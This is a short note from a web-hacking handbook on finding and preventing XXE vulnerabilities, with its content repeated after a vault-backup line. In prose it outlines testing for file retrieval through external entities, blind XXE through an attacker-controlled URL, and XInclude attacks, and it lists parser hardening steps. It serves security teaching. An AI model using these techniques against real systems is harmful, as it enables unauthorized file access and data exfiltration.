handbook/tools/3.Web-Hacking/4.Injection/XXE/Commands/Testing-and-Prevention.md


## Testing & Prevention

**How to Find and Test for XXE vulnerabilities**
- Use BurpSuite's Web Vulnerability Scanner
- Manually testing involves the following:
	- Testing for file retrieval by defining an external entity based on a well-known OS file
	- Testing for blind XXE by defining an external entity based on a URL to a system you control
		§ Burp Collaborator Client can be used for this
	- Testing for vulnerab inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack

**How to Prevent XXE Vulnerabilities**
- Disable features that allow an application's XML parsing library to support potentially dangerous XML features that the application does not need
- Disable resolution of external entities
- Disable support for XInclude
	- Done via configuration options or programmatically overriding default behavor
vault backup: 2024-08-31 01:07:21 2024-08-30 23:07:22 +00:00
			`## Testing & Prevention`

			`How to Find and Test for XXE vulnerabilities`
			`- Use BurpSuite's Web Vulnerability Scanner`
			`- Manually testing involves the following:`
			`- Testing for file retrieval by defining an external entity based on a well-known OS file`
			`- Testing for blind XXE by defining an external entity based on a URL to a system you control`
			`§ Burp Collaborator Client can be used for this`
			`- Testing for vulnerab inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack`

			`How to Prevent XXE Vulnerabilities`
			`- Disable features that allow an application's XML parsing library to support potentially dangerous XML features that the application does not need`
			`- Disable resolution of external entities`
			`- Disable support for XInclude`
			`- Done via configuration options or programmatically overriding default behavor`